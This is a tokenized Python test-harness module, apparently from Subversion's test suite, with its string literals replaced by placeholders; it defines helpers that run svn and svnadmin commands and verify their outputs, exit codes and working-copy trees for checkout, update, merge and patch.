<EOL> def guarantee_empty_repository ( path ) : <EOL> """<STR_LIT>""" <EOL> if path == main . pristine_greek_repos_dir : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> main . safe_rmtree ( path ) <EOL> main . create_repos ( path ) <EOL> def guarantee_greek_repository ( path , minor_version ) : <EOL> """<STR_LIT>""" <EOL> if path == main . pristine_greek_repos_dir : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> main . safe_rmtree ( path ) <EOL> if main . copy_repos ( main . pristine_greek_repos_dir , path , <NUM_LIT:1> , <NUM_LIT:1> , minor_version ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> main . chmod_tree ( path , <NUM_LIT:0> <NUM_LIT> , <NUM_LIT:0> <NUM_LIT> ) <EOL> def run_and_verify_atomic_ra_revprop_change ( message , <EOL> expected_stdout , <EOL> expected_stderr , <EOL> expected_exit , <EOL> url , revision , propname , <EOL> old_propval , propval , <EOL> want_error ) : <EOL> """<STR_LIT>""" <EOL> KEY_OLD_PROPVAL = "<STR_LIT>" <EOL> KEY_NEW_PROPVAL = "<STR_LIT:value>" <EOL> def skel_make_atom ( word ) : <EOL> return "<STR_LIT>" % ( len ( word ) , word ) <EOL> def make_proplist_skel_part ( nick , val ) : <EOL> if val is None : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" % ( skel_make_atom ( nick ) , skel_make_atom ( val ) ) <EOL> skel = "<STR_LIT>" % ( make_proplist_skel_part ( KEY_OLD_PROPVAL , old_propval ) , <EOL> make_proplist_skel_part ( KEY_NEW_PROPVAL , propval ) ) <EOL> exit_code , out , err = main . run_atomic_ra_revprop_change ( url , revision , <EOL> propname , skel , <EOL> want_error ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_svnlook ( message , expected_stdout , <EOL> expected_stderr , * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None and expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svnlook2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svnlook2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> exit_code , out , err = main . run_svnlook ( * varargs ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_svnadmin ( message , expected_stdout , <EOL> expected_stderr , * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None and expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svnadmin2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svnadmin2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> exit_code , out , err = main . run_svnadmin ( * varargs ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_svnversion ( message , wc_dir , trail_url , <EOL> expected_stdout , expected_stderr , * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None and expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svnversion2 ( message , wc_dir , trail_url , <EOL> expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svnversion2 ( message , wc_dir , trail_url , <EOL> expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> if trail_url is None : <EOL> exit_code , out , err = main . run_svnversion ( wc_dir , * varargs ) <EOL> else : <EOL> exit_code , out , err = main . run_svnversion ( wc_dir , trail_url , * varargs ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_svn ( message , expected_stdout , expected_stderr , * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None : <EOL> if isinstance ( expected_stderr , verify . ExpectedOutput ) : <EOL> if not expected_stderr . matches ( [ ] ) : <EOL> expected_exit = <NUM_LIT:1> <EOL> elif expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svn2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svn2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> if expected_stderr is None : <EOL> raise verify . SVNIncorrectDatatype ( "<STR_LIT>" ) <EOL> want_err = None <EOL> if isinstance ( expected_stderr , verify . ExpectedOutput ) : <EOL> if not expected_stderr . matches ( [ ] ) : <EOL> want_err = True <EOL> elif expected_stderr != [ ] : <EOL> want_err = True <EOL> exit_code , out , err = main . run_svn ( want_err , * varargs ) <EOL> verify . verify_outputs ( message , out , err , expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_load ( repo_dir , dump_file_content , <EOL> bypass_prop_validation = False ) : <EOL> "<STR_LIT>" <EOL> if not isinstance ( dump_file_content , list ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> expected_stderr = [ ] <EOL> if bypass_prop_validation : <EOL> exit_code , output , errput = main . run_command_stdin ( <EOL> main . svnadmin_binary , expected_stderr , <NUM_LIT:0> , <NUM_LIT:1> , dump_file_content , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , repo_dir ) <EOL> else : <EOL> exit_code , output , errput = main . run_command_stdin ( <EOL> main . svnadmin_binary , expected_stderr , <NUM_LIT:0> , <NUM_LIT:1> , dump_file_content , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , repo_dir ) <EOL> verify . verify_outputs ( "<STR_LIT>" , None , errput , <EOL> None , expected_stderr ) <EOL> def run_and_verify_dump ( repo_dir , deltas = False ) : <EOL> "<STR_LIT>" <EOL> if deltas : <EOL> exit_code , output , errput = main . run_svnadmin ( '<STR_LIT>' , '<STR_LIT>' , <EOL> repo_dir ) <EOL> else : <EOL> exit_code , output , errput = main . run_svnadmin ( '<STR_LIT>' , repo_dir ) <EOL> verify . verify_outputs ( "<STR_LIT>" , output , errput , <EOL> verify . AnyOutput , verify . AnyOutput ) <EOL> return output <EOL> def run_and_verify_svnrdump ( dumpfile_content , expected_stdout , <EOL> expected_stderr , expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> exit_code , output , err = main . run_svnrdump ( dumpfile_content , * varargs ) <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> err = map ( lambda x : x . replace ( '<STR_LIT:\r\n>' , '<STR_LIT:\n>' ) , err ) <EOL> for index , line in enumerate ( err [ : ] ) : <EOL> if re . search ( "<STR_LIT>" , line ) : <EOL> del err [ index ] <EOL> verify . verify_outputs ( "<STR_LIT>" , output , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( "<STR_LIT>" , exit_code , expected_exit ) <EOL> return output <EOL> def run_and_verify_svnmucc ( message , expected_stdout , expected_stderr , <EOL> * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None and expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svnmucc2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svnmucc2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> exit_code , out , err = main . run_svnmucc ( * varargs ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def load_repo ( sbox , dumpfile_path = None , dump_str = None , <EOL> bypass_prop_validation = False ) : <EOL> "<STR_LIT>" <EOL> if not dump_str : <EOL> dump_str = open ( dumpfile_path , "<STR_LIT:rb>" ) . read ( ) <EOL> main . safe_rmtree ( sbox . repo_dir , <NUM_LIT:1> ) <EOL> main . safe_rmtree ( sbox . wc_dir , <NUM_LIT:1> ) <EOL> main . create_repos ( sbox . repo_dir ) <EOL> run_and_verify_load ( sbox . repo_dir , dump_str . splitlines ( True ) , <EOL> bypass_prop_validation ) <EOL> run_and_verify_svn ( None , None , [ ] , "<STR_LIT>" , sbox . repo_url , sbox . wc_dir ) <EOL> return dump_str <EOL> def expected_noop_update_output ( rev ) : <EOL> """<STR_LIT>""" <EOL> return verify . createExpectedOutput ( "<STR_LIT>" <EOL> % ( rev ) , <EOL> "<STR_LIT>" ) <EOL> def run_and_verify_checkout2 ( do_remove , <EOL> URL , wc_dir_name , output_tree , disk_tree , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_tree = output_tree . old_tree ( ) <EOL> if isinstance ( disk_tree , wc . State ) : <EOL> disk_tree = disk_tree . old_tree ( ) <EOL> if do_remove : <EOL> main . safe_rmtree ( wc_dir_name ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT>' , <EOL> URL , wc_dir_name , * args ) <EOL> actual = tree . build_tree_from_checkout ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> actual = tree . build_tree_from_wc ( wc_dir_name ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , disk_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> def run_and_verify_checkout ( URL , wc_dir_name , output_tree , disk_tree , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> return run_and_verify_checkout2 ( ( '<STR_LIT>' not in args ) , <EOL> URL , wc_dir_name , output_tree , disk_tree , <EOL> singleton_handler_a , <EOL> a_baton , <EOL> singleton_handler_b , <EOL> b_baton , <EOL> * args ) <EOL> def run_and_verify_export ( URL , export_dir_name , output_tree , disk_tree , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> assert isinstance ( output_tree , wc . State ) <EOL> assert isinstance ( disk_tree , wc . State ) <EOL> disk_tree = disk_tree . old_tree ( ) <EOL> output_tree = output_tree . old_tree ( ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT>' , <EOL> URL , export_dir_name , * args ) <EOL> actual = tree . build_tree_from_checkout ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual , export_dir_name ) <EOL> raise <EOL> actual = tree . build_tree_from_wc ( export_dir_name , ignore_svn = False ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , disk_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual , export_dir_name ) <EOL> raise <EOL> class LogEntry : <EOL> def __init__ ( self , revision , changed_paths = None , revprops = None ) : <EOL> self . revision = revision <EOL> if changed_paths == None : <EOL> self . changed_paths = { } <EOL> else : <EOL> self . changed_paths = changed_paths <EOL> if revprops == None : <EOL> self . revprops = { } <EOL> else : <EOL> self . revprops = revprops <EOL> def assert_changed_paths ( self , changed_paths ) : <EOL> """<STR_LIT>""" <EOL> if self . changed_paths != changed_paths : <EOL> raise Failure ( '<STR_LIT:\n>' + '<STR_LIT:\n>' . join ( difflib . ndiff ( <EOL> pprint . pformat ( changed_paths ) . splitlines ( ) , <EOL> pprint . pformat ( self . changed_paths ) . splitlines ( ) ) ) ) <EOL> def assert_revprops ( self , revprops ) : <EOL> """<STR_LIT>""" <EOL> if self . revprops != revprops : <EOL> raise Failure ( '<STR_LIT:\n>' + '<STR_LIT:\n>' . join ( difflib . ndiff ( <EOL> pprint . pformat ( revprops ) . splitlines ( ) , <EOL> pprint . pformat ( self . revprops ) . splitlines ( ) ) ) ) <EOL> class LogParser : <EOL> def parse ( self , data ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> for i in data : <EOL> self . parser . Parse ( i ) <EOL> self . parser . Parse ( '<STR_LIT>' , True ) <EOL> except xml . parsers . expat . ExpatError , e : <EOL> raise verify . SVNUnexpectedStdout ( '<STR_LIT>' % ( e , '<STR_LIT>' . join ( data ) , ) ) <EOL> return self . entries <EOL> def __init__ ( self ) : <EOL> self . parser = xml . parsers . expat . ParserCreate ( ) <EOL> self . parser . StartElementHandler = self . handle_start_element <EOL> self . parser . EndElementHandler = self . handle_end_element <EOL> self . parser . CharacterDataHandler = self . handle_character_data <EOL> self . ignore_elements ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ignore_tags ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . cdata = [ ] <EOL> self . property = None <EOL> self . kind = None <EOL> self . action = None <EOL> self . entries = [ ] <EOL> def ignore ( self , * args , ** kwargs ) : <EOL> del self . cdata [ : ] <EOL> def ignore_tags ( self , * args ) : <EOL> for tag in args : <EOL> setattr ( self , tag , self . ignore ) <EOL> def ignore_elements ( self , * args ) : <EOL> for element in args : <EOL> self . ignore_tags ( element + '<STR_LIT>' , element + '<STR_LIT>' ) <EOL> def handle_start_element ( self , name , attrs ) : <EOL> getattr ( self , name + '<STR_LIT>' ) ( attrs ) <EOL> def handle_end_element ( self , name ) : <EOL> getattr ( self , name + '<STR_LIT>' ) ( ) <EOL> def handle_character_data ( self , data ) : <EOL> self . cdata . append ( data ) <EOL> def use_cdata ( self ) : <EOL> result = '<STR_LIT>' . join ( self . cdata ) . strip ( ) <EOL> del self . cdata [ : ] <EOL> return result <EOL> def svn_prop ( self , name ) : <EOL> self . entries [ - <NUM_LIT:1> ] . revprops [ '<STR_LIT>' + name ] = self . use_cdata ( ) <EOL> def logentry_start ( self , attrs ) : <EOL> self . entries . append ( LogEntry ( int ( attrs [ '<STR_LIT>' ] ) ) ) <EOL> def author_end ( self ) : <EOL> self . svn_prop ( '<STR_LIT>' ) <EOL> def msg_end ( self ) : <EOL> self . svn_prop ( '<STR_LIT>' ) <EOL> def date_end ( self ) : <EOL> self . cdata [ : ] = [ '<STR_LIT>' ] <EOL> self . svn_prop ( '<STR_LIT:date>' ) <EOL> def property_start ( self , attrs ) : <EOL> self . property = attrs [ '<STR_LIT:name>' ] <EOL> def property_end ( self ) : <EOL> self . entries [ - <NUM_LIT:1> ] . revprops [ self . property ] = self . use_cdata ( ) <EOL> def path_start ( self , attrs ) : <EOL> self . kind = attrs [ '<STR_LIT>' ] <EOL> self . action = attrs [ '<STR_LIT:action>' ] <EOL> def path_end ( self ) : <EOL> self . entries [ - <NUM_LIT:1> ] . changed_paths [ self . use_cdata ( ) ] = [ { '<STR_LIT>' : self . kind , <EOL> '<STR_LIT:action>' : self . action } ] <EOL> def run_and_verify_log_xml ( message = None , expected_paths = None , <EOL> expected_revprops = None , expected_stdout = None , <EOL> expected_stderr = None , args = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if message == None : <EOL> message = '<STR_LIT:U+0020>' . join ( args ) <EOL> parse = True <EOL> if expected_stderr == None : <EOL> expected_stderr = [ ] <EOL> else : <EOL> parse = False <EOL> if expected_stdout != None : <EOL> parse = False <EOL> log_args = list ( args ) <EOL> if expected_paths != None : <EOL> log_args . append ( '<STR_LIT>' ) <EOL> ( exit_code , stdout , stderr ) = run_and_verify_svn ( <EOL> message , expected_stdout , expected_stderr , <EOL> '<STR_LIT>' , '<STR_LIT>' , * log_args ) <EOL> if not parse : <EOL> return <EOL> entries = LogParser ( ) . parse ( stdout ) <EOL> for index in range ( len ( entries ) ) : <EOL> entry = entries [ index ] <EOL> if expected_revprops != None : <EOL> entry . assert_revprops ( expected_revprops [ index ] ) <EOL> if expected_paths != None : <EOL> entry . assert_changed_paths ( expected_paths [ index ] ) <EOL> def verify_update ( actual_output , <EOL> actual_mergeinfo_output , <EOL> actual_elision_output , <EOL> wc_dir_name , <EOL> output_tree , <EOL> mergeinfo_output_tree , <EOL> elision_output_tree , <EOL> disk_tree , <EOL> status_tree , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> check_props = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( actual_output , wc . State ) : <EOL> actual_output = actual_output . old_tree ( ) <EOL> if isinstance ( actual_mergeinfo_output , wc . State ) : <EOL> actual_mergeinfo_output = actual_mergeinfo_output . old_tree ( ) <EOL> if isinstance ( actual_elision_output , wc . State ) : <EOL> actual_elision_output = actual_elision_output . old_tree ( ) <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_tree = output_tree . old_tree ( ) <EOL> if isinstance ( mergeinfo_output_tree , wc . State ) : <EOL> mergeinfo_output_tree = mergeinfo_output_tree . old_tree ( ) <EOL> if isinstance ( elision_output_tree , wc . State ) : <EOL> elision_output_tree = elision_output_tree . old_tree ( ) <EOL> if isinstance ( disk_tree , wc . State ) : <EOL> disk_tree = disk_tree . old_tree ( ) <EOL> if isinstance ( status_tree , wc . State ) : <EOL> status_tree = status_tree . old_tree ( ) <EOL> if output_tree : <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual_output , output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual_output , wc_dir_name ) <EOL> raise <EOL> if mergeinfo_output_tree : <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual_mergeinfo_output , <EOL> mergeinfo_output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual_mergeinfo_output , <EOL> wc_dir_name ) <EOL> raise <EOL> if elision_output_tree : <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual_elision_output , <EOL> elision_output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual_elision_output , <EOL> wc_dir_name ) <EOL> raise <EOL> if disk_tree : <EOL> actual_disk = tree . build_tree_from_wc ( wc_dir_name , check_props ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual_disk , disk_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , disk_tree ) <EOL> _log_tree_state ( "<STR_LIT>" , actual_disk ) <EOL> raise <EOL> if status_tree : <EOL> run_and_verify_status ( wc_dir_name , status_tree ) <EOL> def verify_disk ( wc_dir_name , disk_tree , check_props = False ) : <EOL> """<STR_LIT>""" <EOL> verify_update ( None , None , None , wc_dir_name , None , None , None , disk_tree , <EOL> None , check_props = check_props ) <EOL> def run_and_verify_update ( wc_dir_name , <EOL> output_tree , disk_tree , status_tree , <EOL> error_re_string = None , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> check_props = False , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) : <EOL> exit_code , output , errput = main . run_svn ( error_re_string , '<STR_LIT>' , * args ) <EOL> else : <EOL> exit_code , output , errput = main . run_svn ( error_re_string , <EOL> '<STR_LIT>' , wc_dir_name , <EOL> * args ) <EOL> if error_re_string : <EOL> rm = re . compile ( error_re_string ) <EOL> for line in errput : <EOL> match = rm . search ( line ) <EOL> if match : <EOL> return <EOL> raise main . SVNUnmatchedError <EOL> actual = wc . State . from_checkout ( output ) <EOL> verify_update ( actual , None , None , wc_dir_name , <EOL> output_tree , None , None , disk_tree , status_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton , <EOL> check_props ) <EOL> def run_and_parse_info ( * args ) : <EOL> """<STR_LIT>""" <EOL> all_infos = [ ] <EOL> iter_info = { } <EOL> prev_key = None <EOL> lock_comment_lines = <NUM_LIT:0> <EOL> lock_comments = [ ] <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT:info>' , * args ) <EOL> for line in output : <EOL> line = line [ : - <NUM_LIT:1> ] <EOL> if lock_comment_lines > <NUM_LIT:0> : <EOL> lock_comments . append ( line ) <EOL> lock_comment_lines = lock_comment_lines - <NUM_LIT:1> <EOL> if lock_comment_lines == <NUM_LIT:0> : <EOL> iter_info [ prev_key ] = lock_comments <EOL> elif len ( line ) == <NUM_LIT:0> : <EOL> all_infos . append ( iter_info ) <EOL> iter_info = { } <EOL> prev_key = None <EOL> lock_comment_lines = <NUM_LIT:0> <EOL> lock_comments = [ ] <EOL> elif line [ <NUM_LIT:0> ] . isspace ( ) : <EOL> iter_info [ prev_key ] += line [ <NUM_LIT:1> : ] <EOL> else : <EOL> key , value = line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> if re . search ( '<STR_LIT>' , key ) : <EOL> match = re . match ( '<STR_LIT>' , key ) <EOL> key = match . group ( <NUM_LIT:1> ) <EOL> lock_comment_lines = int ( match . group ( <NUM_LIT:2> ) ) <EOL> elif len ( value ) > <NUM_LIT:1> : <EOL> iter_info [ key ] = value [ <NUM_LIT:1> : ] <EOL> else : <EOL> iter_info [ key ] = '<STR_LIT>' <EOL> prev_key = key <EOL> return all_infos <EOL> def run_and_verify_info ( expected_infos , * args ) : <EOL> """<STR_LIT>""" <EOL> actual_infos = run_and_parse_info ( * args ) <EOL> actual_infos . sort ( key = lambda info : info [ '<STR_LIT>' ] ) <EOL> try : <EOL> if len ( actual_infos ) != len ( expected_infos ) : <EOL> raise verify . SVNUnexpectedStdout ( <EOL> "<STR_LIT>" <EOL> % ( len ( expected_infos ) , len ( actual_infos ) ) ) <EOL> for actual , expected in zip ( actual_infos , expected_infos ) : <EOL> for key , value in expected . items ( ) : <EOL> assert '<STR_LIT::>' not in key <EOL> if value is None and key in actual : <EOL> raise main . SVNLineUnequal ( "<STR_LIT>" <EOL> % ( key , actual [ key ] ) ) <EOL> if value is not None and key not in actual : <EOL> raise main . SVNLineUnequal ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( key , value ) ) <EOL> if value is not None and not re . match ( value , actual [ key ] ) : <EOL> raise verify . SVNUnexpectedStdout ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( key , value , actual [ key ] ) ) <EOL> except : <EOL> sys . stderr . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( actual_infos , expected_infos ) ) <EOL> raise <EOL> def run_and_verify_merge ( dir , rev1 , rev2 , url1 , url2 , <EOL> output_tree , <EOL> mergeinfo_output_tree , <EOL> elision_output_tree , <EOL> disk_tree , status_tree , skip_tree , <EOL> error_re_string = None , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> check_props = False , <EOL> dry_run = True , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> merge_command = [ "<STR_LIT>" ] <EOL> if url2 : <EOL> merge_command . extend ( ( url1 + "<STR_LIT:@>" + str ( rev1 ) , url2 + "<STR_LIT:@>" + str ( rev2 ) ) ) <EOL> else : <EOL> if not ( rev1 is None and rev2 is None ) : <EOL> merge_command . append ( "<STR_LIT>" + str ( rev1 ) + "<STR_LIT::>" + str ( rev2 ) ) <EOL> merge_command . append ( url1 ) <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> merge_command . append ( dir ) <EOL> merge_command = tuple ( merge_command ) <EOL> if dry_run : <EOL> pre_disk = tree . build_tree_from_wc ( dir ) <EOL> dry_run_command = merge_command + ( '<STR_LIT>' , ) <EOL> dry_run_command = dry_run_command + args <EOL> exit_code , out_dry , err_dry = main . run_svn ( error_re_string , <EOL> * dry_run_command ) <EOL> post_disk = tree . build_tree_from_wc ( dir ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , post_disk , pre_disk ) <EOL> except tree . SVNTreeError : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise <EOL> merge_command = merge_command + args <EOL> exit_code , out , err = main . run_svn ( error_re_string , * merge_command ) <EOL> if error_re_string : <EOL> if not error_re_string . startswith ( "<STR_LIT>" ) : <EOL> error_re_string = "<STR_LIT>" + error_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( error_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , err , None , expected_err ) <EOL> return <EOL> elif err : <EOL> raise verify . SVNUnexpectedStderr ( err ) <EOL> merge_diff_out = [ ] <EOL> mergeinfo_notification_out = [ ] <EOL> mergeinfo_elision_out = [ ] <EOL> mergeinfo_notifications = False <EOL> elision_notifications = False <EOL> for line in out : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> mergeinfo_notifications = True <EOL> elision_notifications = False <EOL> elif line . startswith ( '<STR_LIT>' ) : <EOL> mergeinfo_notifications = False <EOL> elision_notifications = True <EOL> elif line . startswith ( '<STR_LIT>' ) or line . startswith ( '<STR_LIT>' ) or line . startswith ( '<STR_LIT>' ) or line . startswith ( '<STR_LIT>' ) : <EOL> mergeinfo_notifications = False <EOL> elision_notifications = False <EOL> if mergeinfo_notifications : <EOL> mergeinfo_notification_out . append ( line ) <EOL> elif elision_notifications : <EOL> mergeinfo_elision_out . append ( line ) <EOL> else : <EOL> merge_diff_out . append ( line ) <EOL> if dry_run and merge_diff_out != out_dry : <EOL> out_copy = set ( merge_diff_out [ : ] ) <EOL> out_dry_copy = set ( out_dry [ : ] ) <EOL> if out_copy != out_dry_copy : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> for x in out_dry : <EOL> logger . warn ( x ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> for x in out : <EOL> logger . warn ( x ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise main . SVNUnmatchedError <EOL> def missing_skip ( a , b ) : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" , a . path ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise Failure <EOL> def extra_skip ( a , b ) : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" , a . path ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise Failure <EOL> myskiptree = tree . build_tree_from_skipped ( out ) <EOL> if isinstance ( skip_tree , wc . State ) : <EOL> skip_tree = skip_tree . old_tree ( ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , myskiptree , skip_tree , <EOL> extra_skip , None , missing_skip , None ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , myskiptree , dir ) <EOL> raise <EOL> actual_diff = svntest . wc . State . from_checkout ( merge_diff_out , False ) <EOL> actual_mergeinfo = svntest . wc . State . from_checkout ( mergeinfo_notification_out , <EOL> False ) <EOL> actual_elision = svntest . wc . State . from_checkout ( mergeinfo_elision_out , <EOL> False ) <EOL> verify_update ( actual_diff , actual_mergeinfo , actual_elision , dir , <EOL> output_tree , mergeinfo_output_tree , elision_output_tree , <EOL> disk_tree , status_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton , <EOL> check_props ) <EOL> def run_and_verify_patch ( dir , patch_path , <EOL> output_tree , disk_tree , status_tree , skip_tree , <EOL> error_re_string = None , <EOL> check_props = False , <EOL> dry_run = True , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> patch_command = [ "<STR_LIT>" ] <EOL> patch_command . append ( patch_path ) <EOL> patch_command . append ( dir ) <EOL> patch_command = tuple ( patch_command ) <EOL> if dry_run : <EOL> pre_disk = tree . build_tree_from_wc ( dir ) <EOL> dry_run_command = patch_command + ( '<STR_LIT>' , ) <EOL> dry_run_command = dry_run_command + args <EOL> exit_code , out_dry , err_dry = main . run_svn ( error_re_string , <EOL> * dry_run_command ) <EOL> post_disk = tree . build_tree_from_wc ( dir ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , post_disk , pre_disk ) <EOL> except tree . SVNTreeError : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise <EOL> patch_command = patch_command + args <EOL> exit_code , out , err = main . run_svn ( True , * patch_command ) <EOL> if error_re_string : <EOL> 